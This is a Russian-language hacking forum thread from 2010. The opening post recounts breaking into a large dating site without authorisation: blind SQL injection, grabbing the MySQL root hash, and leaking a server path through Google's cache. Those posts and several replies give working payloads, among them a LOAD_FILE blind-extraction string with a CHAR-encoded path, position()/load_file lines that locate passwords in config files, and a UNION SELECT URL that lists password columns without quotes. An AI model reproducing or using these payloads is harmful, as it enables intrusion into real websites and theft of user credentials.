ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
10.12.2010, 10:05
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
вот тут решил поделиться небольшим опытом
Недавно столкнулся с такой проблемой, нашел в одном крупном датинге слепую инъекцию. Снял пароль root'a для mysql, благо он крутился под ним. Потом нашел директорию http://www.хороший_датинг.com/phpmyadmin/ и оставалось лишь расшифровать хеш. Но вот тут я завис не 2 месяца. Поднятые на дедиках брутилки так ничего и не дали. Платные онлайн-сервисы тоже мне никак не помогли.
Короче промучившись с брутом, я решил поискать иной способ проникновения. Возникла мысль прочитать файл коннекта к базе, ведь там пароль должен был лежать в открытом виде. Вся надежда была на то, что админ не пользуется различными приблудами типа Zend Optimizer для шифрования php-кода.
С помощью сканера директорий и файлов http://scan.0day.in:8080/action/scan я нашел файл http://www.хороший_датинг.com/auth.php. Оставалось вывести его содержимое через слепую инъекцию. Но для начала мне надо было узнать путь до файла. Можно было подставляя служебные символы во все формы сайта попытаться вывести ошибку, но я решил для начала воспользоваться гуглом. По запросу site: www.хороший_датинг.com mysql или home можно иногда получить полный путь до корня, так как иногда скрипты сервера глючат и этот глюк индексирует гугл. Так случилось и в этот раз. И даже не смотря на то, что глюкнувший скрипт уже работал нормально, в хеше гугла сохранился пусть до корня.
Код:
Code:
/home/ldc/хороший_датинг/public_html/login.php
Зачарив путь до нужного мне скрипта
Код:
Code:
+and+ascii(substring((LOAD_FILE(CHAR(47,104,111,109,101,47,108,100,99,47,245,238,240,238,248,232,233,95,228,224,242,232,237,227,47,112,117,98,108,105,99,95,104,116,109,108,47,108,111,103,105,110,46,112,104,112))),1,1))>96
Я понял что перебирать придется руками, а это не есть гуд. SIMP4 выводит блингом значения до 1 пробела, поэтому все что он мне показал было |
|
|
15.12.2010, 06:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
33658
Репутация:
19
|
|
Информация к размышлению
Код:
Code:
position("pass" IN load_file("/path/config.php"))
select substring(load_file("/path/config.php"),pos)
|
|
|
|
15.12.2010, 06:53
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от totenkopf
totenkopf said:
Информация к размышлению
Код:
Code:
position("pass" IN load_file("/path/config.php"))
select substring(load_file("/path/config.php"),pos)
а что за функция "position"?
|
|
|
|
15.12.2010, 07:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
33658
Репутация:
19
|
|
Возвращает позицию вхождения подстроки в строку или ноль если строка не найдена.
Функция таит в себе огромные возможности. Как вам например такой запрос:
Код:
Code:
http://site.ru/index.php?id=1+UNION+SELECT+1,group_concat(concat_ws(0x3a,table_schema,table_name,column_name))+FROM+information_schema.columns+WHERE+position(0x70617373+in+column_name)+--+
Выводит все таблицы в названии полей которых есть "pass". Причем кавычки не используются. |
|
|
|
15.12.2010, 07:51
|
|
Постоянный
Регистрация: 05.06.2009
Сообщений: 706
Провел на форуме:
2764047
Репутация:
759
|
|
durito - нашенский ))
проявил волю, терпение и способности анализировать и исправлять свои ошибки.
"Папа, а что такое Гугл?"
"Это хакирский сайт"
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
